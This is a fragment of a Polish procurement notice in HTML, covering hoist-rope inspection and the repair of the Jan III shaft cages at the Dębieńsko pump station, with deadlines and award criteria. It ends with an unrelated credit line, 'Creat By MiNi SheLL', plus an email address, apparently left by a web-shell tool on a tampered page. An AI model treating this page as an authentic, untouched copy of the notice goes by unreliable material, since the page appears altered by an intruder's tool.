2.3.6	Kontrola liny nośnej w zawieszeniu wraz z konserwacją wszystkich połączeń przegubowych, sercówek   oraz kieszeni trzonów głównych. Wszystkie prace winny być wykonane ściśle według zaleceń określonych w DTR producenta zawieszeń, ze szczególnym uwzględnieniem warunków mocowania liny nośnej                     w zawieszeniu 
2.3.7	Wykonanie niezbędnych skróceń liny nośnej. 
2.3.8	Wszelkie prace związane z kontrolą liny nośnej w zawieszeniu za wyjątkiem obsługi maszyny wyciągowej i obsługi sygnalizacji szybowej. 
2.3.9	Demontaż urządzeń i osprzętu po kontroli. 
2.3.10	Przygotowanie szybu do oddania do ruchu. 
2.3.11	Przeprowadzenie jazd próbnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V
Remont naczyń wyciągowych szybu Jan III - Pompownia Dębieńsko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót:
1)	Opracowanie technologii remontu naczyń wyciągowych tj. 2 klatek czteropiętrowych zabudowanych w szybie Jan III,
2)	Wykonanie remontu naczyń wyciągowych polegającego na:
a)	wymianie konstrukcji ram dolnych klatek,
b)	wymianie mocowania rolek ram dolnych klatek,
c)	wymianie bocznych blach ram dolnych klatek.
d)	wykonanie zabezpieczenia antykorozyjnego wymienionych elementów naczyń wyciągowych poprzez:
e)	podwójne nałożenie warstwy farby podkładowej - minia,
f)	potrójne nałożenie warstwy farby powierzchniowej - chlorokauczuk.
3)	Wszystkie materiały i narzędzia wykorzystane do realizacji zadania dostarcza na swój koszt Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com